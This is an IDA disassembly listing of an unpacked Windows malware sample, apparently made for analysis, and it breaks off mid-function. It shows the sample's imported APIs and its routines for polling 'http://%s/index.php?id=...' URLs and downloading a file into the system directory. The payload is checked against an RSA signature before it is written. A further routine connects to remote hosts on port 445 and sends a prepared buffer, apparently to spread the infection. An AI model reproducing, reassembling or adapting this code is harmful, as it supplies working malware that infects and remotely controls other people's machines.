;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 5AD14CBC13FF74930C1817B18DA611C3
; File Name : u:\work\5ad14cbc13ff74930c1817b18da611c3_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 31420000
; Section 1. (virtual address 00001000)
; Virtual size : 00005000 ( 20480.)
; Section size in file : 00005000 ( 20480.)
; Offset to raw data for section: 00001000
; Flags E0000080: Bss Executable Readable Writable
; Alignment : default
unicode macro page,string,zero
irpc c,<string>
db '&c', page
endm
ifnb <zero>
dw zero
endif
endm
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX0 segment para public 'CODE' use32
assume cs:UPX0
;org 31421000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dword_31421000 dd 77DDEAF4h ; resolved to->ADVAPI32.RegCreateKeyExAdword_31421004 dd 77DDEBE7h ; resolved to->ADVAPI32.RegSetValueExAdword_31421008 dd 77DD7883h ; resolved to->ADVAPI32.RegQueryValueExAdword_3142100C dd 77DD761Bh ; resolved to->ADVAPI32.RegOpenKeyExA ; sub_31422882+1D�r
dword_31421010 dd 77DDEDE5h ; resolved to->ADVAPI32.RegDeleteValueAdword_31421014 dd 77DD6BF0h ; resolved to->ADVAPI32.RegCloseKey ; sub_31422882+4E�r ...
dword_31421018 dd 77E34D78h ; resolved to->ADVAPI32.AbortSystemShutdownAdword_3142101C dd 77DEA2F9h ; resolved to->ADVAPI32.CryptCreateHashdword_31421020 dd 77DEA122h ; resolved to->ADVAPI32.CryptHashDatadword_31421024 dd 77DEAB80h ; resolved to->ADVAPI32.CryptVerifySignatureAdword_31421028 dd 77DEA254h ; resolved to->ADVAPI32.CryptDestroyHashdword_3142102C dd 77DEA544h ; resolved to->ADVAPI32.CryptDestroyKeydword_31421030 dd 77DE8546h ; resolved to->ADVAPI32.CryptReleaseContextdword_31421034 dd 77DE7F96h ; resolved to->ADVAPI32.CryptAcquireContextAdword_31421038 dd 77DEA879h ; resolved to->ADVAPI32.CryptImportKey align 10h
dword_31421040 dd 7C809AE4h ; resolved to->KERNEL32.VirtualFreedword_31421044 dd 7C809A51h ; resolved to->KERNEL32.VirtualAllocdword_31421048 dd 7C80B4CFh ; resolved to->KERNEL32.GetModuleFileNameAdword_3142104C dd 7C80BAA1h ; resolved to->KERNEL32.lstrcmpiAdword_31421050 dd 7C8286EEh ; resolved to->KERNEL32.CopyFileAdword_31421054 dd 7C86136Dh ; resolved to->KERNEL32.WinExecdword_31421058 dd 7C864B0Fh ; resolved to->KERNEL32.CreateToolhelp32Snapshotdword_3142105C dd 7C863DE5h ; resolved to->KERNEL32.Process32Firstdword_31421060 dd 7C801E16h ; resolved to->KERNEL32.TerminateProcessdword_31421064 dd 7C863F58h ; resolved to->KERNEL32.Process32Nextdword_31421068 dd 7C80BE01h ; resolved to->KERNEL32.lstrcpyA ; sub_31422B67+8F�r
dword_3142106C dd 7C8308ADh ; resolved to->KERNEL32.CreateEventAdword_31421070 dd 7C802520h ; resolved to->KERNEL32.WaitForSingleObjectdword_31421074 dd 7C831EABh ; resolved to->KERNEL32.DeleteFileA ; sub_31422A9B+F�r
dword_31421078 dd 7C810D87h ; resolved to->KERNEL32.WriteFiledword_3142107C dd 7C809B47h ; resolved to->KERNEL32.CloseHandle ; sub_314211A0+F6�r ...
dword_31421080 dd 7C801A24h ; resolved to->KERNEL32.CreateFileA ; sub_314221C4+57�r
dword_31421084 dd 7C80BDB6h ; resolved to->KERNEL32.lstrlenA ; sub_31421422+64�r ...
dword_31421088 dd 7C834D41h ; resolved to->KERNEL32.lstrcatA ; sub_31422A9B+40�r
dword_3142108C dd 7C814EEAh ; resolved to->KERNEL32.GetSystemDirectoryA ; sub_31422A9B+1B�r
dword_31421090 dd 7C80D262h ; resolved to->KERNEL32.GetLocaleInfoAdword_31421094 dd 7C802442h ; resolved to->KERNEL32.Sleep ; sub_31421801+16C�r ...
dword_31421098 dd 7C80978Eh ; resolved to->KERNEL32.InterlockedExchangedword_3142109C dd 7C810111h ; resolved to->KERNEL32.lstrcpynAdword_314210A0 dd 7C80DDF5h ; resolved to->KERNEL32.GetCurrentProcessdword_314210A4 dd 7C80ADA0h ; resolved to->KERNEL32.GetProcAddress ; sub_31421DF0+2C�r
dword_314210A8 dd 7C801D77h ; resolved to->KERNEL32.LoadLibraryA ; sub_314223B2+116�r
dword_314210AC dd 7C80220Fh ; resolved to->KERNEL32.WriteProcessMemorydword_314210B0 dd 7C8309E1h ; resolved to->KERNEL32.OpenProcess ; sub_3142292E+92�r
dword_314210B4 dd 7C80B6A1h ; resolved to->KERNEL32.GetModuleHandleA ; UPX0:31422336�r
dword_314210B8 dd 7C80929Ch ; resolved to->KERNEL32.GetTickCountdword_314210BC dd 7C80E93Fh ; resolved to->KERNEL32.CreateMutexAdword_314210C0 dd 7C810637h ; resolved to->KERNEL32.CreateThread ; sub_31421F52+12�r
dword_314210C4 dd 7C802367h ; resolved to->KERNEL32.CreateProcessAdword_314210C8 dd 7C80A017h ; resolved to->KERNEL32.SetEventdword_314210CC dd 7C81320Ch ; resolved to->KERNEL32.OpenEventAdword_314210D0 dd 7C80C058h ; resolved to->KERNEL32.ExitThread ; sub_314221C4+66�r ...
dword_314210D4 dd 7C809766h ; resolved to->KERNEL32.InterlockedIncrement ; sub_314225C3+3F�r ...
dword_314210D8 dd 7C80180Eh ; resolved to->KERNEL32.ReadFiledword_314210DC dd 7C810A77h ; resolved to->KERNEL32.GetFileSizedword_314210E0 dd 7C81CDDAh ; resolved to->KERNEL32.ExitProcess ; sub_31422A9B+C3�r
dword_314210E4 dd 7C910331h, 0 ; resolved to->NTDLL.RtlGetLastWin32Errordword_314210EC dd 77C371BCh ; resolved to->MSVCRT.sranddword_314210F0 dd 77C46F70h ; resolved to->MSVCRT.memcpydword_314210F4 dd 77C478A0h ; resolved to->MSVCRT.strlendword_314210F8 dd 77C475F0h ; resolved to->MSVCRT.memsetdword_314210FC dd 77C371D3h ; resolved to->MSVCRT.rand ; sub_31421F73:loc_31421F84�r ...
; ---------------------------------------------------------------------------
loc_31421100: ; DATA XREF: UPX0:loc_31422CD0�r
xchg eax, esp
pop esp
retn
; ---------------------------------------------------------------------------
db 77h
dword_31421104 dd 77C47C60h ; resolved to->MSVCRT.strstr ; sub_3142207E:loc_314220AF�r ...
dword_31421108 dd 77C47660h ; resolved to->MSVCRT.strchr ; sub_31421422+AA�r
align 10h
dword_31421110 dd 7E42DE87h ; resolved to->USER32.FindWindowAdword_31421114 dd 7E41BE4Bh ; resolved to->USER32.GetForegroundWindowdword_31421118 dd 7E418A80h ; resolved to->USER32.GetWindowThreadProcessIddword_3142111C dd 7E41A8ADh ; resolved to->USER32.wsprintfA ; sub_314215C7+77�r ...
dd 0
dword_31421124 dd 42C30BFAh ; resolved to->WININET.InternetOpenUrlA ; sub_314215C7+9D�r
dword_31421128 dd 42C2C8A1h ; resolved to->WININET.InternetOpenA ; sub_314215C7+89�r
dword_3142112C dd 42C1DAC1h ; resolved to->WININET.InternetCloseHandledword_31421130 dd 42C367F6h ; resolved to->WININET.InternetGetConnectedState ; UPX0:314227A2�r
dword_31421134 dd 42C2ABF4h ; resolved to->WININET.InternetReadFile ; sub_314215C7+B0�r
dd 0
dword_3142113C dd 71AB664Dh ; resolved to->WS2_32.WSAStartupdword_31421140 dd 71AB3E00h ; resolved to->WS2_32.binddword_31421144 dd 71AB88D3h ; resolved to->WS2_32.listendword_31421148 dd 71AC1028h ; resolved to->WS2_32.acceptdword_3142114C dd 71AB50C8h ; resolved to->WS2_32.gethostnamedword_31421150 dd 71AB94DCh ; resolved to->WS2_32.WSAGetLastErrordword_31421154 dd 71AB4FD4h ; resolved to->WS2_32.gethostbynamedword_31421158 dd 71AB3B91h ; resolved to->WS2_32.socket ; sub_314221C4+AC�r
dword_3142115C dd 71AB3F41h ; resolved to->WS2_32.inet_ntoa ; sub_31422712+D�r
dword_31421160 dd 71AB2B66h ; resolved to->WS2_32.ntohs ; sub_314221C4+F0�r
dword_31421164 dd 71AB406Ah ; resolved to->WS2_32.connectdword_31421168 dd 71AB428Ah ; resolved to->WS2_32.send ; sub_3142207E+67�r ...
dword_3142116C dd 71AB615Ah ; resolved to->WS2_32.recv ; sub_31421801+1D8�r ...
dword_31421170 dd 71AC0BDEh ; resolved to->WS2_32.shutdown ; sub_3142207E+128�r
dword_31421174 dd 71AB9639h ; resolved to->WS2_32.closesocket ; sub_3142207E+12F�r
align 10h
dword_31421180 dd 0FFFFFFFFh, 0 dd offset nullsub_1
align 10h
dword_31421190 dd 0FFFFFFFFh, 0 dd offset nullsub_2
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_314211A0 proc near ; CODE XREF: sub_31421422+16D�p
var_110 = byte ptr -110h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 110h
push ebx
push esi
xor esi, esi
push edi
push esi
push esi
push esi
push 1
push offset aMozilla4_0Comp ; "Mozilla/4.0 (compatible; MSIE 6.0; Wind"...
call dword_31421128 ; InternetOpenA
mov ebx, eax
cmp ebx, esi
jnz short loc_314211CB
push 1
jmp loc_31421261
; ---------------------------------------------------------------------------
loc_314211CB: ; CODE XREF: sub_314211A0+22�j
lea eax, [ebp+var_110]
push 104h
push eax
call dword_3142108C ; GetSystemDirectoryA
mov edi, dword_31421088
lea eax, [ebp+var_110]
push offset dword_314241F8
push eax
call edi ; lstrcatA
lea eax, [ebp+var_110]
push 6
push eax
call dword_31421084 ; lstrlenA
lea eax, [ebp+eax+var_110]
push eax
call sub_31421F73
pop ecx
lea eax, [ebp+var_110]
pop ecx
push offset dword_314241F0
push eax
call edi ; lstrcatA
push esi
push esi
push 2
push esi
push esi
lea eax, [ebp+var_110]
push 40000000h
push eax
call dword_31421080 ; CreateFileA
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jnz short loc_31421241
push 2
jmp short loc_31421261
; ---------------------------------------------------------------------------
loc_31421241: ; CODE XREF: sub_314211A0+9B�j
push esi
push esi
push esi
push esi
push [ebp+arg_0]
push ebx
call dword_31421124 ; InternetOpenUrlA
cmp eax, esi
mov [ebp+arg_0], eax
jnz short loc_31421264
push [ebp+var_4]
call dword_3142107C ; CloseHandle
push 3
loc_31421261: ; CODE XREF: sub_314211A0+26�j
; sub_314211A0+9F�j
pop eax
jmp short loc_314212B5
; ---------------------------------------------------------------------------
loc_31421264: ; CODE XREF: sub_314211A0+B4�j
mov edi, 100000h
push edi
call sub_31422CA5
mov ebx, eax
pop ecx
lea eax, [ebp+var_8]
push eax
push edi
push ebx
push [ebp+arg_0]
call dword_31421134 ; InternetReadFile
lea eax, [ebp+var_C]
push esi
push eax
push [ebp+var_8]
push ebx
push [ebp+var_4]
call dword_31421078 ; WriteFile
push [ebp+var_4]
call dword_3142107C ; CloseHandle
lea eax, [ebp+var_110]
push 5
push eax
call sub_31421FA3
push ebx
call sub_31422CB9
add esp, 0Ch
xor eax, eax
loc_314212B5: ; CODE XREF: sub_314211A0+C2�j
pop edi
pop esi
pop ebx
leave
retn
sub_314211A0 endp
; =============== S U B R O U T I N E =======================================
sub_314212BA proc near ; CODE XREF: sub_31421422+F8�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = byte ptr 0Ch
mov ecx, [esp+arg_4]
mov eax, [esp+arg_0]
push ebx
push esi
push edi
or edi, 0FFFFFFFFh
inc eax
push 0Fh
lea esi, [ecx+1]
sub edi, ecx
pop ecx
loc_314212D1: ; CODE XREF: sub_314212BA+56�j
mov dl, [eax]
mov bl, [eax-1]
add edx, ecx
add bl, cl
sar edx, 4
and dl, 3
sub dl, [esp+0Ch+arg_8]
shl bl, 2
or dl, bl
mov [esi-1], dl
mov dl, [eax+1]
mov bl, [eax]
dec dl
add bl, cl
and dl, cl
sub dl, [esp+0Ch+arg_8]
add eax, 3
shl bl, 4
and bl, 0F0h
or dl, bl
mov [esi], dl
inc esi
inc esi
lea edx, [edi+esi]
cmp edx, 30h
jl short loc_314212D1
pop edi
pop esi
pop ebx
retn
sub_314212BA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31421316 proc near ; CODE XREF: sub_3142139B+27�p
var_38 = byte ptr -38h
var_1C = byte ptr -1Ch
arg_0 = byte ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 38h
push ebx
push esi
push edi
push 6
pop ecx
mov esi, offset aAbcdefghijklmn ; "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
lea edi, [ebp+var_1C]
push 6
rep movsd
movsw
movsb
pop ecx
mov esi, offset aAbcdefghijkl_0 ; "abcdefghijklmnopqrstuvwxyz"
lea edi, [ebp+var_38]
mov ebx, [ebp+arg_4]
rep movsd
movsw
test ebx, ebx
movsb
jge short loc_31421349
add ebx, 1Ah
loc_31421349: ; CODE XREF: sub_31421316+2E�j
movsx edi, [ebp+arg_0]
mov esi, dword_31421108
lea eax, [ebp+var_1C]
push edi
push eax
call esi ; strchr
pop ecx
test eax, eax
pop ecx
jz short loc_31421373
lea ecx, [ebp+var_1C]
push 1Ah
sub eax, ecx
pop ecx
add eax, ebx
cdq
idiv ecx
mov al, [ebp+edx+var_1C]
jmp short loc_31421396
; ---------------------------------------------------------------------------
loc_31421373: ; CODE XREF: sub_31421316+48�j
lea eax, [ebp+var_38]
push edi
push eax
call esi ; strchr
pop ecx
test eax, eax
pop ecx
jz short loc_31421393
lea ecx, [ebp+var_38]
push 1Ah
sub eax, ecx
pop ecx
add eax, ebx
cdq
idiv ecx
mov al, [ebp+edx+var_38]
jmp short loc_31421396
; ---------------------------------------------------------------------------
loc_31421393: ; CODE XREF: sub_31421316+68�j
mov al, [ebp+arg_0]
loc_31421396: ; CODE XREF: sub_31421316+5B�j
; sub_31421316+7B�j
pop edi
pop esi
pop ebx
leave
retn
sub_31421316 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3142139B proc near ; CODE XREF: sub_31421422+D6�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, [ebp+arg_4]
push esi
mov esi, [ebp+arg_8]
push edi
mov al, [eax]
test al, al
jz short loc_314213F8
mov edi, [ebp+arg_0]
push ebx
loc_314213B0: ; CODE XREF: sub_3142139B+58�j
sub al, 2
inc [ebp+arg_4]
mov bl, al
mov eax, esi
neg eax
mov byte ptr [ebp+arg_0], bl
push eax
push [ebp+arg_0]
call sub_31421316
mov [edi], al
pop ecx
inc edi
cmp bl, 61h
pop ecx
jl short loc_314213DC
cmp bl, 7Ah
jg short loc_314213DC
movsx esi, bl
sub esi, 61h
loc_314213DC: ; CODE XREF: sub_3142139B+34�j
; sub_3142139B+39�j
cmp bl, 41h
jl short loc_314213EC
cmp bl, 5Ah
jg short loc_314213EC
movsx esi, bl
sub esi, 41h
loc_314213EC: ; CODE XREF: sub_3142139B+44�j
; sub_3142139B+49�j
mov eax, [ebp+arg_4]
mov al, [eax]
test al, al
jnz short loc_314213B0
pop ebx
jmp short loc_314213FB
; ---------------------------------------------------------------------------
loc_314213F8: ; CODE XREF: sub_3142139B+F�j
mov edi, [ebp+arg_0]
loc_314213FB: ; CODE XREF: sub_3142139B+5B�j
and byte ptr [edi], 0
pop edi
pop esi
pop ebp
retn
sub_3142139B endp
; =============== S U B R O U T I N E =======================================
sub_31421402 proc near ; CODE XREF: sub_31421422+104�p
arg_0 = dword ptr 4
xor eax, eax
xor ecx, ecx
loc_31421406: ; CODE XREF: sub_31421402+12�j
mov edx, [esp+arg_0]
movzx edx, byte ptr [ecx+edx]
add eax, edx
inc ecx
cmp ecx, 30h
jl short loc_31421406
push 1Ah
cdq
pop ecx
idiv ecx
mov eax, edx
add eax, 61h
retn
sub_31421402 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31421422 proc near ; CODE XREF: sub_314215C7+BA�p
var_174 = dword ptr -174h
var_170 = byte ptr -170h
var_168 = byte ptr -168h
var_164 = byte ptr -164h
var_134 = dword ptr -134h
var_130 = dword ptr -130h
var_12C = dword ptr -12Ch
var_128 = dword ptr -128h
var_124 = byte ptr -124h
var_11C = byte ptr -11Ch
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_31421180
push offset loc_31422CD0
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 164h
push ebx
push esi
push edi
mov [ebp+var_128], 1
and [ebp+var_4], 0
push offset aZer0 ; "zer0"
push [ebp+arg_0]
call dword_31421104 ; strstr
pop ecx
pop ecx
mov edi, eax
mov [ebp+var_130], edi
test edi, edi
jz loc_314215A8
add edi, 4
mov [ebp+var_130], edi
jz loc_314215A8
push edi
call dword_31421084 ; lstrlenA
mov [ebp+var_1C], eax
cmp eax, 50h
jle loc_314215A8
and byte ptr [edi+100h], 0
mov al, [edi]
mov [ebp+var_168], al
movsx ebx, al
sub ebx, 61h
mov [ebp+var_12C], ebx
js loc_314215A8
cmp ebx, 1Ah
jge loc_314215A8
inc edi
mov [ebp+var_130], edi
push 7Eh
push edi
call dword_31421108 ; strchr
pop ecx
pop ecx
mov esi, eax
mov [ebp+var_134], esi
test esi, esi
jz loc_314215A8
mov al, [esi]
mov [ebp+var_170], al
and byte ptr [esi], 0
push ebx
push edi
lea eax, [ebp+var_11C]
push eax
call sub_3142139B
mov al, [ebp+var_170]
mov [esi], al
inc esi
mov [ebp+var_130], esi
xor edi, edi
push edi
lea eax, [ebp+var_164]
push eax
lea eax, [esi+1]
push eax
call sub_314212BA
lea eax, [ebp+var_164]
push eax
call sub_31421402
add esp, 1Ch
cmp [esi], al
jnz short loc_314215A8
push 44h
push offset dword_31424000
lea eax, [ebp+var_124]
push eax
call sub_3142172F
add esp, 0Ch
lea eax, [ebp+var_174]
push eax
push 30h
lea eax, [ebp+var_164]
push eax
lea eax, [ebp+var_11C]
push eax
call dword_31421084 ; lstrlenA
push eax
lea eax, [ebp+var_11C]
push eax
lea eax, [ebp+var_124]
push eax
call sub_3142179A
add esp, 18h
test eax, eax
jnz short loc_3142159B
cmp [ebp+var_174], edi
jz short loc_3142159B
lea eax, [ebp+var_11C]
push eax
call sub_314211A0
pop ecx
mov [ebp+var_128], edi
loc_3142159B: ; CODE XREF: sub_31421422+15C�j
; sub_31421422+164�j
lea eax, [ebp+var_124]
push eax
call sub_3142177E
pop ecx
loc_314215A8: ; CODE XREF: sub_31421422+4E�j
; sub_31421422+5D�j ...
or [ebp+var_4], 0FFFFFFFFh
call nullsub_1
mov eax, [ebp+var_128]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_31421422 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_314215C7 proc near ; CODE XREF: sub_314216A2+2A�p
var_E8 = byte ptr -0E8h
var_84 = byte ptr -84h
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0E8h
push ebx
push esi
push edi
push 4000h
call sub_31422CA5
pop ecx
mov esi, eax
lea eax, [ebp+var_E8]
push 63h
push eax
push 7
push 400h
call dword_31421090 ; GetLocaleInfoA
xor ebx, ebx
cmp byte ptr [ebp+arg_4], bl
jz short loc_3142162F
lea eax, [ebp+var_E8]
push eax
lea eax, [ebp+var_84]
push dword_31424FEC
push dword_31425004
push offset aIaimwmlpigzshv ; "iaimwmlpigzshvbp"
push [ebp+arg_0]
push offset aHttpSIndex_php ; "http://%s/index.php?id=%s&scn=%d&inf=%d"...
push eax
call dword_3142111C ; wsprintfA
add esp, 1Ch
jmp short loc_31421647
; ---------------------------------------------------------------------------
loc_3142162F: ; CODE XREF: sub_314215C7+34�j
push [ebp+arg_0]
lea eax, [ebp+var_84]
push offset aHttpS ; "http://%s"
push eax
call dword_3142111C ; wsprintfA
add esp, 0Ch
loc_31421647: ; CODE XREF: sub_314215C7+66�j
push ebx
push ebx
push ebx
push ebx
push offset aMozilla4_0Co_0 ; "Mozilla/4.0 (compatible; MSIE 6.0; Wind"...
call dword_31421128 ; InternetOpenA
push ebx
mov edi, eax
push ebx
push ebx
lea eax, [ebp+var_84]
push ebx
push eax
push edi
call dword_31421124 ; InternetOpenUrlA
mov ebx, eax
lea eax, [ebp+var_4]
push eax
push 2000h
push esi
push ebx
call dword_31421134 ; InternetReadFile
push esi
mov [ebp+arg_4], eax
call sub_31421422
push esi
call sub_31422CB9
mov esi, dword_3142112C
pop ecx
pop ecx
push ebx
call esi ; InternetCloseHandle
push edi
call esi ; InternetCloseHandle
mov eax, [ebp+arg_4]
pop edi
pop esi
pop ebx
leave
retn
sub_314215C7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_314216A2 proc near ; DATA XREF: sub_314223B2+15B�o
push ebx
mov ebx, dword_31421098
push esi
push edi
loc_314216AB: ; CODE XREF: sub_314216A2+88�j
xor esi, esi
mov edi, 46021h
loc_314216B2: ; CODE XREF: sub_314216A2+86�j
inc esi
inc esi
call sub_31422038
test eax, eax
jz short loc_314216FC
mov al, byte_31424080[esi+esi*4]
push eax
push off_31424081[esi+esi*4]
call sub_314215C7
or eax, edi
pop ecx
xor eax, 8064h
pop ecx
shl eax, 3
mov edi, eax
xor eax, 228h
test ax, 0FFFFh
jnz short loc_314216FC
push 0
push offset dword_31425004
call ebx ; InterlockedExchange
push 0
push offset dword_31424FEC
call ebx ; InterlockedExchange
loc_314216FC: ; CODE XREF: sub_314216A2+19�j
; sub_314216A2+46�j
call dword_314210FC ; rand
push 3
cdq
pop ecx
idiv ecx
add esi, edx
call sub_31422068
xor edx, edx
mov ecx, 493E0h
div ecx
add edx, 61B48h
push edx
call dword_31421094 ; Sleep
cmp esi, 16h
jb short loc_314216B2
jmp loc_314216AB
sub_314216A2 endp
; =============== S U B R O U T I N E =======================================
sub_3142172F proc near ; CODE XREF: sub_31421422+11E�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ebx
mov ebx, [esp+4+arg_0]
push esi
mov esi, dword_31421034
push edi
xor edi, edi
push edi
push 1
push edi
push edi
push ebx
call esi ; CryptAcquireContextA
test eax, eax
jnz short loc_3142175C
push 8
push 1
push edi
push edi
push ebx
call esi ; CryptAcquireContextA
test eax, eax
jnz short loc_3142175C
push 1
pop eax
jmp short loc_3142177A
; ---------------------------------------------------------------------------
loc_3142175C: ; CODE XREF: sub_3142172F+19�j
; sub_3142172F+26�j
lea eax, [ebx+4]
push eax
push edi
push edi
push [esp+18h+arg_8]
push [esp+1Ch+arg_4]
push dword ptr [ebx]
call dword_31421038 ; CryptImportKey
neg eax
sbb eax, eax
and al, 0FEh
inc eax
inc eax
loc_3142177A: ; CODE XREF: sub_3142172F+2B�j
pop edi
pop esi
pop ebx
retn
sub_3142172F endp
; =============== S U B R O U T I N E =======================================
sub_3142177E proc near ; CODE XREF: sub_31421422+180�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push dword ptr [esi+4]
call dword_3142102C ; CryptDestroyKey
push 0
push dword ptr [esi]
call dword_31421030 ; CryptReleaseContext
xor eax, eax
pop esi
retn
sub_3142177E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3142179A proc near ; CODE XREF: sub_31421422+152�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push esi
mov esi, [ebp+arg_0]
push edi
lea eax, [ebp+arg_0]
xor edi, edi
push eax
push edi
push edi
push 8003h
push dword ptr [esi]
call dword_3142101C ; CryptCreateHash
test eax, eax
jnz short loc_314217C0
push 1
pop eax
jmp short loc_314217FD
; ---------------------------------------------------------------------------
loc_314217C0: ; CODE XREF: sub_3142179A+1F�j
push edi
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_31421020 ; CryptHashData
test eax, eax
jnz short loc_314217D9
push 2
pop edi
jmp short loc_314217F2
; ---------------------------------------------------------------------------
loc_314217D9: ; CODE XREF: sub_3142179A+38�j
push edi
push edi
push dword ptr [esi+4]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_0]
call dword_31421024 ; CryptVerifySignatureA
mov ecx, [ebp+arg_14]
mov [ecx], eax
loc_314217F2: ; CODE XREF: sub_3142179A+3D�j
push [ebp+arg_0]
call dword_31421028 ; CryptDestroyHash
mov eax, edi
loc_314217FD: ; CODE XREF: sub_3142179A+24�j
pop edi
pop esi
pop ebp
retn
sub_3142179A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31421801 proc near ; CODE XREF: sub_3142255F+36�p
; sub_314225C3+48�p ...
var_89E4 = byte ptr -89E4h
var_897C = byte ptr -897Ch
var_690C = byte ptr -690Ch
var_689C = byte ptr -689Ch
var_5DD8 = byte ptr -5DD8h
var_4834 = byte ptr -4834h
var_4833 = byte ptr -4833h
var_37A0 = byte ptr -37A0h
var_2CDC = byte ptr -2CDCh
var_2CDB = byte ptr -2CDBh
var_2CD8 = byte ptr -2CD8h
var_24F4 = byte ptr -24F4h
var_24E4 = byte ptr -24E4h
var_21C0 = byte ptr -21C0h
var_21BC = byte ptr -21BCh
var_21B0 = byte ptr -21B0h
var_1F28 = byte ptr -1F28h
var_1EAC = byte ptr -1EACh
var_16DC = byte ptr -16DCh
var_1231 = byte ptr -1231h
var_F44 = byte ptr -0F44h
var_EA4 = byte ptr -0EA4h
var_798 = dword ptr -798h
var_788 = byte ptr -788h
var_774 = byte ptr -774h
var_730 = byte ptr -730h
var_134 = byte ptr -134h
var_133 = byte ptr -133h
var_E4 = byte ptr -0E4h
var_E1 = byte ptr -0E1h
var_B7 = byte ptr -0B7h
var_B5 = byte ptr -0B5h
var_B4 = byte ptr -0B4h
var_6C = byte ptr -6Ch
var_4C = byte ptr -4Ch
var_24 = word ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_6 = byte ptr -6
var_5 = byte ptr -5
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 89E4h
call sub_31422CF0
mov eax, dword_31424C84
push ebx
push edi
push 1
pop edi
xor ebx, ebx
mov [ebp+var_14], eax
mov eax, dword_31424C88
push ebx
push edi
push 2
mov [ebp+var_10], eax
mov [ebp+var_C], edi
call dword_31421158 ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jz loc_31421D61
push esi
mov esi, [ebp+arg_0]
push 1Dh
push esi
call dword_3142115C ; inet_ntoa
push eax
lea eax, [ebp+var_6C]
push eax
call dword_3142109C ; lstrcpynA
lea eax, [ebp+var_6C]
push eax
lea eax, [ebp+var_4C]
push offset loc_31424C78
push eax
call dword_3142111C ; wsprintfA
add esp, 0Ch
xor ecx, ecx
lea eax, [ebp+var_133]
loc_31421874: ; CODE XREF: sub_31421801+83�j
mov dl, [ebp+ecx+var_4C]
mov [eax-1], dl
and byte ptr [eax], 0
inc ecx
inc eax
inc eax
cmp ecx, 28h
jl short loc_31421874
push 60h
lea eax, [ebp+var_E4]
push offset dword_31424798
push eax
call sub_31422CE2 ; memcpy
lea eax, [ebp+var_4C]
push eax
call sub_31422CDC ; strlen
shl eax, 1
push eax
lea eax, [ebp+var_134]
push eax
lea eax, [ebp+var_B4]
push eax
call sub_31422CE2 ; memcpy
add esp, 1Ch
lea eax, [ebp+var_4C]
push 9
push (offset aC+3)
push eax
call sub_31422CDC ; strlen
pop ecx
lea eax, [ebp+eax*2+var_B5]
push eax
call sub_31422CE2 ; memcpy
lea eax, [ebp+var_4C]
push eax
call sub_31422CDC ; strlen
add al, 1Ah
push edi
shl al, 1
mov [ebp+var_5], al
lea eax, [ebp+var_5]
push eax
lea eax, [ebp+var_E1]
push eax
call sub_31422CE2 ; memcpy
lea eax, [ebp+var_4C]
push eax
call sub_31422CDC ; strlen
shl al, 1
add al, 9
push edi
mov [ebp+var_6], al
lea eax, [ebp+var_6]
push eax
lea eax, [ebp+var_B7]
push eax
call sub_31422CE2 ; memcpy
push 0E29h
lea eax, [ebp+var_1F28]
push 31h
push eax
call sub_31422CD6 ; memset
push 10h
lea eax, [ebp+var_24]
push ebx
push eax
call sub_31422CD6 ; memset
add esp, 44h
mov [ebp+var_24], 2
push 1BDh
call dword_31421160 ; ntohs
mov [ebp+var_22], ax
lea eax, [ebp+var_24]
push 10h
push eax
push [ebp+var_4]
mov [ebp+var_20], esi
call dword_31421164 ; connect
cmp eax, 0FFFFFFFFh
jz loc_31421D57
mov esi, dword_31421094
mov edi, 0C8h
push edi
call esi ; Sleep
push ebx
mov ebx, dword_31421168
push 89h
push offset dword_31424580
push [ebp+var_4]
call ebx ; send
push edi
